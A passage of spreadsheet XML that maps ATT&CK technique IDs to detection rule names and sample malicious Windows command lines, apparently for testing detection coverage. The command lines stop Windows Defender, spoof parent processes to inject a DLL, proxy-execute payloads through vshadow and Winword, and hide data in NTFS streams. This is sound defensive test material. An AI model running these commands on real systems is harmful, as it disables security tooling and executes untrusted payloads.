      <c r="A3340" s="43" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B3340" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C3340" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D3340" s="43" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E3340" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe "/EXEFilename" "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" "/RunAs" 8 /Run</t>
        </is>
      </c>
      <c r="F3340" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3340" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3340" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3340" s="43" t="n"/>
      <c r="J3340" s="43" t="n"/>
      <c r="K3340" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3341" ht="15.75" customHeight="1" s="42">
      <c r="A3341" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3341" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C3341" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D3341" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E3341" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\calc.exe" -suspicious_flag</t>
        </is>
      </c>
      <c r="F3341" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3341" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3341" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3341" s="43" t="n"/>
      <c r="J3341" s="43" t="n"/>
      <c r="K3341" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3342" ht="15.75" customHeight="1" s="42">
      <c r="A3342" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3342" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C3342" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D3342" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E3342" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\calc.exe" -"suspicious_flag"</t>
        </is>
      </c>
      <c r="F3342" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3342" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3342" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3342" s="43" t="n"/>
      <c r="J3342" s="43" t="n"/>
      <c r="K3342" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3343" ht="15.75" customHeight="1" s="42">
      <c r="A3343" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3343" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C3343" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D3343" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E3343" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\calc.exe" -SuspicIOUS_FlAg</t>
        </is>
      </c>
      <c r="F3343" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3343" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3343" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3343" s="43" t="n"/>
      <c r="J3343" s="43" t="n"/>
      <c r="K3343" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3344" ht="15.75" customHeight="1" s="42">
      <c r="A3344" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3344" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C3344" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D3344" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E3344" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\calc.exe" -SusPiciOus_fLAG</t>
        </is>
      </c>
      <c r="F3344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3344" s="43" t="n"/>
      <c r="J3344" s="43" t="n"/>
      <c r="K3344" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3345" ht="15.75" customHeight="1" s="42">
      <c r="A3345" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B3345" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir</t>
        </is>
      </c>
      <c r="C3345" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory</t>
        </is>
      </c>
      <c r="D3345" s="43" t="inlineStr">
        <is>
          <t>fff9d2b7-e11c-4a69-93d3-40ef66189767</t>
        </is>
      </c>
      <c r="E3345" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {gi $env:windir/System32/cmd.exe | % {copy $_.FullName -destination $env:allusersprofile\cmd.exe}}</t>
        </is>
      </c>
      <c r="F3345" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3345" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3345" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3345" s="43" t="n"/>
      <c r="J3345" s="43" t="n"/>
      <c r="K3345" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3346" ht="15.75" customHeight="1" s="42">
      <c r="A3346" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B3346" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C3346" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3346" s="43" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E3346" s="43" t="inlineStr">
        <is>
          <t>netsh.exe i""nt portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F3346" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3346" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3346" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3346" s="43" t="n"/>
      <c r="J3346" s="43" t="n"/>
      <c r="K3346" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3347" ht="15.75" customHeight="1" s="42">
      <c r="A3347" s="43" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B3347" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_selectmyparent</t>
        </is>
      </c>
      <c r="C3347" s="43" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution</t>
        </is>
      </c>
      <c r="D3347" s="43" t="inlineStr">
        <is>
          <t>52ff7941-8211-46f9-84f8-9903efb7077d</t>
        </is>
      </c>
      <c r="E3347" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {. ""C:\AtomicRedTeam\atomics\T1134.004\src\PPID-Spoof.ps1""
$ppid=Get-Process explorer | select -expand id
PPID-Spoof -ppid $ppid "-spawnto" ""C:\Program Files\Internet Explorer\iexplore.exe"" -dllpath ""C:\AtomicRedTeam\atomics\T1134.004\bin\calc.dll""}</t>
        </is>
      </c>
      <c r="F3347" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3347" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3347" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3347" s="43" t="n"/>
      <c r="J3347" s="43" t="n"/>
      <c r="K3347" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3348" ht="15.75" customHeight="1" s="42">
      <c r="A3348" s="43" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B3348" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_selectmyparent</t>
        </is>
      </c>
      <c r="C3348" s="43" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution</t>
        </is>
      </c>
      <c r="D3348" s="43" t="inlineStr">
        <is>
          <t>52ff7941-8211-46f9-84f8-9903efb7077d</t>
        </is>
      </c>
      <c r="E3348" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {. ""C:\AtomicRedTeam\atomics\T1134.004\src\PPID-Spoof.ps1""
$ppid=Get-Process explorer | select -expand id
PPID-Spoof -dllpath ""C:\AtomicRedTeam\atomics\T1134.004_x0008_in\calc.dll"" -ppid $ppid -spawnto ""C:\Program Files\Internet Explorer\iexplore.exe""}</t>
        </is>
      </c>
      <c r="F3348" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3348" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3348" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3348" s="43" t="n"/>
      <c r="J3348" s="43" t="n"/>
      <c r="K3348" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3349" ht="15.75" customHeight="1" s="42">
      <c r="A3349" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3349" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bash_command_execution</t>
        </is>
      </c>
      <c r="C3349" s="43" t="inlineStr">
        <is>
          <t>Indirect Inline Command Execution Via Bash.EXE</t>
        </is>
      </c>
      <c r="D3349" s="43" t="inlineStr">
        <is>
          <t>5edc2273-c26f-406c-83f3-f4d948e740dd</t>
        </is>
      </c>
      <c r="E3349" s="43" t="inlineStr">
        <is>
          <t>echo whoami | C:\Windows\System32\bash.exe</t>
        </is>
      </c>
      <c r="F3349" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3349" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3349" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3349" s="43" t="n"/>
      <c r="J3349" s="43" t="n"/>
      <c r="K3349" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3350" ht="15.75" customHeight="1" s="42">
      <c r="A3350" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3350" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_exec_from_trusted_locations</t>
        </is>
      </c>
      <c r="C3350" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Office Document Executed From Trusted Location</t>
        </is>
      </c>
      <c r="D3350" s="43" t="inlineStr">
        <is>
          <t>f99abdf0-6283-4e71-bd2b-b5c048a94743</t>
        </is>
      </c>
      <c r="E3350" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "start winword.exe C:\Users\Admin\AppData\Roaming\Microsoft\Templates\malicious.docm"</t>
        </is>
      </c>
      <c r="F3350" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3350" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3350" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3350" s="43" t="n"/>
      <c r="J3350" s="43" t="n"/>
      <c r="K3350" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3351" ht="15.75" customHeight="1" s="42">
      <c r="A3351" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3351" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_winword_dll_load</t>
        </is>
      </c>
      <c r="C3351" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary DLL Load Using Winword</t>
        </is>
      </c>
      <c r="D3351" s="43" t="inlineStr">
        <is>
          <t>f7375e28-5c14-432f-b8d1-1db26c832df3</t>
        </is>
      </c>
      <c r="E3351" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "WINWORD.EXE /^l payload.dll"</t>
        </is>
      </c>
      <c r="F3351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3351" s="43" t="n"/>
      <c r="J3351" s="43" t="n"/>
      <c r="K3351" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3352" ht="15.75" customHeight="1" s="42">
      <c r="A3352" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3352" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_splwow64_cli_anomaly</t>
        </is>
      </c>
      <c r="C3352" s="43" t="inlineStr">
        <is>
          <t>Suspicious Splwow64 Without Params</t>
        </is>
      </c>
      <c r="D3352" s="43" t="inlineStr">
        <is>
          <t>1f1a8509-2cbb-44f5-8751-8e1571518ce2</t>
        </is>
      </c>
      <c r="E3352" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\splwow64.exe"</t>
        </is>
      </c>
      <c r="F3352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3352" s="43" t="n"/>
      <c r="J3352" s="43" t="n"/>
      <c r="K3352" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3353" ht="15.75" customHeight="1" s="42">
      <c r="A3353" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3353" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_vshadow_exec</t>
        </is>
      </c>
      <c r="C3353" s="43" t="inlineStr">
        <is>
          <t>Proxy Execution via Vshadow</t>
        </is>
      </c>
      <c r="D3353" s="43" t="inlineStr">
        <is>
          <t>d7c75059-2901-4578-b209-8837fd31c6a8</t>
        </is>
      </c>
      <c r="E3353" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c vshadow.exe -e^xec=C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F3353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3353" s="43" t="n"/>
      <c r="J3353" s="43" t="n"/>
      <c r="K3353" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3354" ht="15.75" customHeight="1" s="42">
      <c r="A3354" s="43" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B3354" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C3354" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D3354" s="43" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E3354" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\Microsoft.NET\Framework\v4.0.30319
egsvcs.exe" C:\Users	haim\AppData\Local\Temp\T1218.009.dll</t>
        </is>
      </c>
      <c r="F3354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3354" s="43" t="n"/>
      <c r="J3354" s="43" t="n"/>
      <c r="K3354" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3355" ht="15.75" customHeight="1" s="42">
      <c r="A3355" s="43" t="inlineStr">
        <is>
          <t>t1222.001</t>
        </is>
      </c>
      <c r="B3355" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_takeown_recursive_own</t>
        </is>
      </c>
      <c r="C3355" s="43" t="inlineStr">
        <is>
          <t>Suspicious Recursive Takeown</t>
        </is>
      </c>
      <c r="D3355" s="43" t="inlineStr">
        <is>
          <t>554601fb-9b71-4bcc-abf4-21a611be4fde</t>
        </is>
      </c>
      <c r="E3355" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "takeown.exe /^f C:\Users	haim\AppData\Local\Temp\T1222.001_takeown_folder /^r"</t>
        </is>
      </c>
      <c r="F3355" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3355" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3355" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3355" s="43" t="n"/>
      <c r="J3355" s="43" t="n"/>
      <c r="K3355" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3356" ht="15.75" customHeight="1" s="42">
      <c r="A3356" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3356" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C3356" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D3356" s="43" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E3356" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Str 'streamcommand'
Invoke-Expression $streamcommand}</t>
        </is>
      </c>
      <c r="F3356" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3356" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3356" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3356" s="43" t="n"/>
      <c r="J3356" s="43" t="n"/>
      <c r="K3356" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3357" ht="15.75" customHeight="1" s="42">
      <c r="A3357" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3357" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hidden_dir_index_allocation</t>
        </is>
      </c>
      <c r="C3357" s="43" t="inlineStr">
        <is>
          <t>Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI</t>
        </is>
      </c>
      <c r="D3357" s="43" t="inlineStr">
        <is>
          <t>0900463c-b33b-49a8-be1d-552a3b553dae</t>
        </is>
      </c>
      <c r="E3357" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c md %temp%\...$.......::i^n^d^e^x_^a^l^l^o^c^a^t^i^o^n &amp; echo too many secrets &gt; %temp%\...$.......::i^n^d^e^x_^a^l^l^o^c^a^t^i^o^n\secrets.txt</t>
        </is>
      </c>
      <c r="F3357" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3357" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3357" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3357" s="43" t="n"/>
      <c r="J3357" s="43" t="n"/>
      <c r="K3357" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3358" ht="15.75" customHeight="1" s="42">
      <c r="A3358" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3358" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_suspicious_cmdline</t>
        </is>
      </c>
      <c r="C3358" s="44" t="inlineStr">
        <is>
          <t>Suspicious AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D3358" s="44" t="inlineStr">
        <is>
          <t>631b22a4-70f4-4e2f-9ea8-42f84d9df6d8</t>
        </is>
      </c>
      <c r="E3358" s="44" t="n"/>
      <c r="F3358" s="44" t="n"/>
      <c r="G3358" s="44" t="n"/>
      <c r="H3358" s="44" t="n"/>
      <c r="I3358" s="44" t="n"/>
      <c r="J3358" s="44" t="n"/>
      <c r="K3358" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3359" ht="15.75" customHeight="1" s="42">
      <c r="A3359" s="44" t="n"/>
      <c r="B3359" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_agentexecutor_susp_usage</t>
        </is>
      </c>
      <c r="C3359" s="44" t="inlineStr">
        <is>
          <t>Suspicious AgentExecutor PowerShell Execution</t>
        </is>
      </c>
      <c r="D3359" s="44" t="inlineStr">
        <is>
          <t>c0b40568-b1e9-4b03-8d6c-b096da6da9ab</t>
        </is>
      </c>
      <c r="E3359" s="44" t="n"/>
      <c r="F3359" s="44" t="n"/>
      <c r="G3359" s="44" t="n"/>
      <c r="H3359" s="44" t="n"/>
      <c r="I3359" s="44" t="n"/>
      <c r="J3359" s="44" t="n"/>
      <c r="K3359" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3360" ht="15.75" customHeight="1" s="42">
      <c r="A3360" s="44" t="n"/>
      <c r="B3360" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll_susp_locations</t>
        </is>
      </c>
      <c r="C3360" s="44" t="inlineStr">
        <is>
          <t>Suspicious DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3360" s="44" t="inlineStr">
        <is>
          <t>84232095-ecca-4015-b0d7-7726507ee793</t>
        </is>
      </c>
      <c r="E3360" s="44" t="n"/>
      <c r="F3360" s="44" t="n"/>
      <c r="G3360" s="44" t="n"/>
      <c r="H3360" s="44" t="n"/>
      <c r="I3360" s="44" t="n"/>
      <c r="J3360" s="44" t="n"/>
      <c r="K3360" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3361" ht="15.75" customHeight="1" s="42">
      <c r="A3361" s="44" t="n"/>
      <c r="B3361" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ntdllpipe_redirect</t>
        </is>
      </c>
      <c r="C3361" s="44" t="inlineStr">
        <is>
          <t>NtdllPipe Like Activity Execution</t>
        </is>
      </c>
      <c r="D3361" s="44" t="inlineStr">
        <is>
          <t>bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2</t>
        </is>
      </c>
      <c r="E3361" s="44" t="n"/>
      <c r="F3361" s="44" t="n"/>
      <c r="G3361" s="44" t="n"/>
      <c r="H3361" s="44" t="n"/>
      <c r="I3361" s="44" t="n"/>
      <c r="J3361" s="44" t="n"/>
      <c r="K3361" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3362" ht="15.75" customHeight="1" s="42">
      <c r="A3362" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3362" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_default_action_modified</t>
        </is>
      </c>
      <c r="C3362" s="44" t="inlineStr">
        <is>
          <t>PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'</t>
        </is>
      </c>
      <c r="D3362" s="44" t="inlineStr">
        <is>
          <t>1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e</t>
        </is>
      </c>
      <c r="E3362" s="44" t="n"/>
      <c r="F3362" s="44" t="n"/>
      <c r="G3362" s="44" t="n"/>
      <c r="H3362" s="44" t="n"/>
      <c r="I3362" s="44" t="n"/>
      <c r="J3362" s="44" t="n"/>
      <c r="K3362" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3363" ht="15.75" customHeight="1" s="42">
      <c r="A3363" s="44" t="n"/>
      <c r="B3363" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_devinit_lolbin_usage</t>
        </is>
      </c>
      <c r="C3363" s="44" t="inlineStr">
        <is>
          <t>Arbitrary MSI Download Via Devinit.EXE</t>
        </is>
      </c>
      <c r="D3363" s="44" t="inlineStr">
        <is>
          <t>90d50722-0483-4065-8e35-57efaadd354d</t>
        </is>
      </c>
      <c r="E3363" s="44" t="n"/>
      <c r="F3363" s="44" t="n"/>
      <c r="G3363" s="44" t="n"/>
      <c r="H3363" s="44" t="n"/>
      <c r="I3363" s="44" t="n"/>
      <c r="J3363" s="44" t="n"/>
      <c r="K3363" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3364" ht="15.75" customHeight="1" s="42">
      <c r="A3364" s="44" t="n"/>
      <c r="B3364" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_arbitrary_dll_csproj_execution</t>
        </is>
      </c>
      <c r="C3364" s="44" t="inlineStr">
        <is>
          <t>Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE</t>
        </is>
      </c>
      <c r="D3364" s="44" t="inlineStr">
        <is>
          <t>d80d5c81-04ba-45b4-84e4-92eba40e0ad3</t>
        </is>
      </c>
      <c r="E3364" s="44" t="n"/>
      <c r="F3364" s="44" t="n"/>
      <c r="G3364" s="44" t="n"/>
      <c r="H3364" s="44" t="n"/>
      <c r="I3364" s="44" t="n"/>
      <c r="J3364" s="44" t="n"/>
      <c r="K3364" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3365" ht="15.75" customHeight="1" s="42">
      <c r="A3365" s="44" t="n"/>
      <c r="B3365" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnetdump_memory_dump</t>
        </is>
      </c>
      <c r="C3365" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Dotnet-Dump</t>
        </is>
      </c>
      <c r="D3365" s="44" t="inlineStr">
        <is>
          <t>53d8d3e1-ca33-4012-adf3-e05a4d652e34</t>
        </is>
      </c>
      <c r="E3365" s="44" t="n"/>
      <c r="F3365" s="44" t="n"/>
      <c r="G3365" s="44" t="n"/>
      <c r="H3365" s="44" t="n"/>
      <c r="I3365" s="44" t="n"/>
      <c r="J3365" s="44" t="n"/>
      <c r="K3365" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3366" ht="15.75" customHeight="1" s="42">
      <c r="A3366" s="44" t="n"/>
      <c r="B3366" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dsacls_abuse_permissions</t>
        </is>
      </c>
      <c r="C3366" s="44" t="inlineStr">
        <is>
          <t>Potentially Over Permissive Permissions Granted Using Dsacls.EXE</t>
        </is>
      </c>
      <c r="D3366" s="44" t="inlineStr">
        <is>
          <t>01c42d3c-242d-4655-85b2-34f1739632f7</t>
        </is>
      </c>
      <c r="E3366" s="44" t="n"/>
      <c r="F3366" s="44" t="n"/>
      <c r="G3366" s="44" t="n"/>
      <c r="H3366" s="44" t="n"/>
      <c r="I3366" s="44" t="n"/>
      <c r="J3366" s="44" t="n"/>
      <c r="K3366" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3367" ht="15.75" customHeight="1" s="42">
      <c r="A3367" s="44" t="n"/>
      <c r="B3367" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_format_uncommon_filesystem_load</t>
        </is>
      </c>
      <c r="C3367" s="44" t="inlineStr">
        <is>
          <t>Uncommon FileSystem Load Attempt By Format.com</t>
        </is>
      </c>
      <c r="D3367" s="44" t="inlineStr">
        <is>
          <t>9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60</t>
        </is>
      </c>
      <c r="E3367" s="44" t="n"/>
      <c r="F3367" s="44" t="n"/>
      <c r="G3367" s="44" t="n"/>
      <c r="H3367" s="44" t="n"/>
      <c r="I3367" s="44" t="n"/>
      <c r="J3367" s="44" t="n"/>
      <c r="K3367" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3368" ht="15.75" customHeight="1" s="42">
      <c r="A3368" s="44" t="n"/>
      <c r="B3368" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_wmiexec_default_powershell</t>
        </is>
      </c>
      <c r="C3368" s="44" t="inlineStr">
        <is>
          <t>HackTool - Wmiexec Default Powershell Command</t>
        </is>
      </c>
      <c r="D3368" s="44" t="inlineStr">
        <is>
          <t>022eaba8-f0bf-4dd9-9217-4604b0bb3bb0</t>
        </is>
      </c>
      <c r="E3368" s="44" t="n"/>
      <c r="F3368" s="44" t="n"/>
      <c r="G3368" s="44" t="n"/>
      <c r="H3368" s="44" t="n"/>
      <c r="I3368" s="44" t="n"/>
      <c r="J3368" s="44" t="n"/>
      <c r="K3368" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3369" ht="15.75" customHeight="1" s="42">
      <c r="A3369" s="44" t="n"/>
      <c r="B3369" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_instalutil_no_log_execution</t>
        </is>
      </c>
      <c r="C3369" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of InstallUtil Without Log</t>
        </is>
      </c>
      <c r="D3369" s="44" t="inlineStr">
        <is>
          <t>d042284c-a296-4988-9be5-f424fadcc28c</t>
        </is>
      </c>
      <c r="E3369" s="44" t="n"/>
      <c r="F3369" s="44" t="n"/>
      <c r="G3369" s="44" t="n"/>
      <c r="H3369" s="44" t="n"/>
      <c r="I3369" s="44" t="n"/>
      <c r="J3369" s="44" t="n"/>
      <c r="K3369" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3370" ht="15.75" customHeight="1" s="42">
